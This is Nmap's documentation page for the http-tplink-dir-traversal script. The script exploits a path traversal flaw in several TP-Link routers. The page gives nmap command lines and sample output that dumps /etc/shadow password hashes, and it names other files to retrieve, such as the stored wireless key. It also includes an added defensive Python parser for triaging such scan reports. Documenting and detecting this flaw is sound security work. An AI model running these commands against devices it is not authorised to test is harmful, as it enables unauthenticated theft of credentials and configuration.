
File http-tplink-dir-traversal

Script types: portrule
Categories: vuln, exploit
Download: http://nmap.org/svn/scripts/http-tplink-dir-traversal.nse

User Summary

Exploits a directory traversal vulnerability present in several TP-Link wireless routers. An attacker can use this vulnerability to read any of the configuration and password files remotely and without authentication.

This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND, but there are several models that use the same HTTP server, so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.

Advisory:

  • http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Other interesting files:

  • /tmp/topology.cnf (Wireless configuration)
  • /tmp/ath0.ap_bss (Wireless encryption key)

Script Arguments

http-tplink-dir-traversal.rfile

Remote file to download. Default: /etc/passwd

http-tplink-dir-traversal.outfile

If set, the remote file is saved to this location.

Other arguments you might want to use with this script:

  • http.useragent - Sets user agent

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

  • nmap -p80 --script http-tplink-dir-traversal.nse <target>
  • nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
  • nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
    

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited remotely and without authentication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
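For triaging scan results, the following added example (not part of the script or of Nmap) parses a report in the format shown above and summarizes the reported state, which leaked shadow entries hold a hash, an empty password field or a locked marker, and which accounts share one hash. The function names `classify` and `triage` are hypothetical, and the sample is abridged from the output above.

```python
import re

# Sample abridged from the Script Output section of this page.
SAMPLE = """\
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
"""

# shadow(5) entry: account name, password field, then seven more colon-separated fields.
SHADOW_RE = re.compile(r"^([A-Za-z_][\w.-]*):([^:]*)(?::[^:]*){7}$")

def classify(pw_field):
    """Map a shadow password field to 'empty', 'locked' or 'hash'."""
    if pw_field == "":
        return "empty"            # no password required for this account
    if pw_field.startswith(("*", "!")):
        return "locked"           # password login disabled
    return "hash"                 # a crypt(3) hash was disclosed

def triage(report):
    """Return (state, {account: status}, [groups of accounts sharing a hash])."""
    state, accounts, by_hash = None, {}, {}
    for raw in report.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw).strip()   # drop the NSE "|" / "|_" gutter
        if line.startswith("State:"):
            state = line.split(":", 1)[1].strip()
        m = SHADOW_RE.match(line)
        if m:
            name, pw = m.groups()
            accounts[name] = classify(pw)
            if accounts[name] == "hash":
                by_hash.setdefault(pw, []).append(name)
    shared = [sorted(names) for names in by_hash.values() if len(names) > 1]
    return state, accounts, shared
```

On the sample, `triage(SAMPLE)` reports that `root` and `Admin` share one hash, so rotating one credential without the other leaves the device exposed after the firmware is fixed.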

Requires


Author: Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See http://nmap.org/book/man-legal.html

action

action (host, port)

MAIN - The script checks for vulnerable devices by attempting to read "etc/shadow" and finding the pattern "root:".

Parameters

  • host:
  • port:
